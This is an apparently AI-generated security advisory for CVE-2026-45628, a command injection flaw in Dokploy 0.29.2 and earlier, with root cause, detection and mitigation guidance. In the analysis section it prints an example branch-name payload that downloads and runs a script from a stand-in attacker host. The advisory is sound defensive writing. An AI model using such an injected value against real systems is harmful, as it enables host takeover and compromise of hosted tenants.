CVE-2026-45628 Overview
CVE-2026-45628 is a command injection vulnerability in Dokploy, a self-hostable Platform as a Service (PaaS). Dokploy versions 0.29.2 and earlier construct shell commands using JavaScript template literals and execute them via child_process.exec(), which spawns /bin/sh -c. User-supplied branch names, repository URLs, and Docker credentials are interpolated into these commands without escaping. An authenticated user with application create or edit privileges can inject arbitrary shell metacharacters to execute commands on the host. The flaw is classified under [CWE-20: Improper Input Validation].
Critical Impact
Authenticated attackers with application management privileges can execute arbitrary shell commands on the Dokploy host, compromising confidentiality and integrity of all hosted applications.
Affected Products
- Dokploy 0.29.2 and earlier
- Self-hosted Dokploy PaaS deployments
- Dokploy-managed Git repository and Docker image workflows
Discovery Timeline
- 2026-05-29 - CVE-2026-45628 published to NVD
- 2026-05-29 - Last updated in NVD database
Technical Details for CVE-2026-45628
Vulnerability Analysis
Dokploy builds shell command strings using JavaScript template literals and passes them to child_process.exec(). The Node.js exec() function invokes commands through /bin/sh -c, meaning any shell metacharacters present in interpolated values are interpreted by the shell. Branch names, repository URLs, and Docker registry credentials supplied by application owners flow directly into these command strings without sanitization or escaping. An authenticated user creating or editing an application can supply a crafted branch name such as main; curl attacker.tld/x.sh | sh and trigger arbitrary command execution under the Dokploy service account. Because Dokploy orchestrates containers, Git clones, and registry logins on the host, the compromised process typically holds Docker socket access and filesystem privileges sufficient to pivot to other tenants on the platform.
Root Cause
The root cause is the use of string interpolation for shell command construction combined with child_process.exec(). Safe alternatives such as child_process.execFile() or spawn() with an argument array bypass the shell entirely and prevent metacharacter interpretation. Dokploy does not validate or escape user-controlled fields before interpolation.
Attack Vector
Exploitation requires network access to the Dokploy interface and an authenticated account with application create or edit rights. The attacker submits a malicious value in any of the affected fields, including Git branch, repository URL, or Docker credentials. Dokploy then executes the resulting concatenated shell command during repository cloning, image pulls, or deployment workflows, running the injected payload with Dokploy's privileges. See the GitHub Security Advisory GHSA-3frc-cfh9-ch2c for technical details.
Detection Methods for CVE-2026-45628
Indicators of Compromise
- Unexpected child processes spawned by the Dokploy Node.js process, particularly sh, bash, curl, wget, or reverse shell binaries outside normal deploy workflows.
- Git branch names, repository URLs, or Docker credential fields containing shell metacharacters such as ;, |, `, $(, or && in Dokploy application records.
- Outbound network connections from the Dokploy host to unfamiliar domains during deployment events.
Detection Strategies
- Audit Dokploy application configurations for non-standard characters in branch names, repository URLs, and registry credentials.
- Monitor process trees rooted at the Dokploy service for shell invocations that do not match git, docker, or buildx operations.
- Review Dokploy audit logs and Git operation logs for create or edit events immediately preceding suspicious host activity.
Monitoring Recommendations
- Enable command-line argument logging on the Dokploy host through auditd or equivalent and forward to a centralized SIEM.
- Alert on Docker socket access or container creation initiated by processes other than the Dokploy backend.
- Track authentication events and privilege changes within Dokploy to identify accounts capable of triggering this vulnerability.
How to Mitigate CVE-2026-45628
Immediate Actions Required
- Upgrade Dokploy to a release later than 0.29.2 that addresses the command injection issue.
- Restrict application create and edit permissions to a minimal set of trusted operators until patched.
- Rotate any Docker registry credentials and Git tokens stored in Dokploy that may have been exposed.
- Review all existing application records for malicious values in branch, repository, and credential fields.
Patch Information
The Dokploy maintainers published advisory GHSA-3frc-cfh9-ch2c describing the issue and fix. Operators should upgrade to a fixed Dokploy release and redeploy affected instances. Verify the installed version with dokploy --version after upgrade.
Workarounds
- Place the Dokploy management interface behind a VPN or reverse proxy with strict authentication and IP allow-listing.
- Disable self-registration and require administrator approval for any account that can create or edit applications.
- Run the Dokploy service as an unprivileged user without direct Docker socket access where feasible, limiting blast radius.
# Configuration example: restrict Dokploy access via reverse proxy allow-list
# nginx snippet placed in front of the Dokploy UI
location / {
allow 10.0.0.0/24; # trusted management network
deny all;
proxy_pass http://127.0.0.1:3000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
